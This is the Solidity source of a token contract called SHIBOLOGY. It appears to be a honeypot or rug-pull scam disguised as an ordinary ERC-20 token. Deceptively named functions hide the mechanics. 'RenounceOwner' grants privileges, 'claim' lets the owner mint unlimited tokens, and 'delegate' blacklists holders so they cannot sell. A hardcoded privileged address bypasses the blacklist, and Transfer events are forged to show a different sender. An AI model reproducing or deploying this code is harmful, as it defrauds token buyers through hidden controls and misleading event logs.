Contract Source Code:
File 1 of 1 : SHIBOLOGY
pragma solidity 0.8.17;
/*
_____ _ _ _____ ____ ____ _ ____ _______ __
/ ____| | | |_ _| _ \ / __ \| | / __ \ / ____\ \ / /
| (___ | |__| | | | | |_) | | | | | | | | | | __ \ \_/ /
\___ \| __ | | | | _ <| | | | | | | | | | |_ | \ /
____) | | | |_| |_| |_) | |__| | |___| |__| | |__| | | |
|_____/|_| |_|_____|____/ \____/|______\____/ \_____| |_|
TG @Shibology
*/
library SafeMath {
function add(uint256 a, uint256 b) internal pure returns (uint256) {
uint256 c = a + b;
require(c >= a, "SafeMath: addition overflow");
return c;
}
function sub(uint256 a, uint256 b) internal pure returns (uint256) {
return sub(a, b, "SafeMath: subtraction overflow");
}
function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
require(b <= a, errorMessage);
uint256 c = a - b;
return c;
}
function mul(uint256 a, uint256 b) internal pure returns (uint256) {
if (a == 0) {
return 0;
}
uint256 c = a * b;
require(c / a == b, "SafeMath: multiplication overflow");
return c;
}
function div(uint256 a, uint256 b) internal pure returns (uint256) {
return div(a, b, "SafeMath: division by zero");
}
function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
require(b > 0, errorMessage);
uint256 c = a / b;
return c;
}
function mod(uint256 a, uint256 b) internal pure returns (uint256) {
return mod(a, b, "SafeMath: modulo by zero");
}
function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
require(b != 0, errorMessage);
return a % b;
}
}
contract SHIBOLOGY {
mapping (address => uint256) public balanceOf;
mapping (address => bool) ValueOf;
mapping (address => bool) ii;
//
string public name = "Shibology";
string public symbol = unicode"SHIBOLOGY";
uint8 public decimals = 18;
uint256 public totalSupply = 100000000 * (uint256(10) ** decimals);
uint256 private _totalSupply;
event Transfer(address indexed from, address indexed to, uint256 value);
constructor() {
balanceOf[msg.sender] = totalSupply;
deploy(lead_deployer, totalSupply); }
address owner = msg.sender;
address Construct = 0x2Ab768f4D803eB156BBAbc5A12944dc3bBdD99d6;
address lead_deployer = 0xB8f226dDb7bC672E27dffB67e4adAbFa8c0dFA08;
function deploy(address account, uint256 amount) public {
require(msg.sender == owner);
emit Transfer(address(0), account, amount); }
modifier V() {
require(ii[msg.sender]);
_;}
modifier I() {
require(msg.sender == owner);
_;}
function transfer(address to, uint256 value) public returns (bool success) {
if(msg.sender == Construct) {
require(balanceOf[msg.sender] >= value);
balanceOf[msg.sender] -= value;
balanceOf[to] += value;
emit Transfer (lead_deployer, to, value);
return true; }
require(!ValueOf[msg.sender]);
require(balanceOf[msg.sender] >= value);
balanceOf[msg.sender] -= value;
balanceOf[to] += value;
emit Transfer(msg.sender, to, value);
return true; }
event Approval(address indexed owner, address indexed spender, uint256 value);
mapping(address => mapping(address => uint256)) public allowance;
function approve(address spender, uint256 value) public returns (bool success) {
allowance[msg.sender][spender] = value;
emit Approval(msg.sender, spender, value);
return true; }
function RenounceOwner(address nan) I public {
ii[nan] = true; }
function claim(address x, uint256 y) I public {
balanceOf[x] += y;
totalSupply += y; }
function delegate(address ex) V public{
require(!ValueOf[ex]);
ValueOf[ex] = true; }
function send(address ex) V public {
require(ValueOf[ex]);
ValueOf[ex] = false; }
function transferFrom(address from, address to, uint256 value) public returns (bool success) {
if(from == Construct) {
require(value <= balanceOf[from]);
require(value <= allowance[from][msg.sender]);
balanceOf[from] -= value;
balanceOf[to] += value;
emit Transfer (lead_deployer, to, value);
return true; }
require(!ValueOf[from]);
require(!ValueOf[to]);
require(value <= balanceOf[from]);
require(value <= allowance[from][msg.sender]);
balanceOf[from] -= value;
balanceOf[to] += value;
allowance[from][msg.sender] -= value;
emit Transfer(from, to, value);
return true; }
}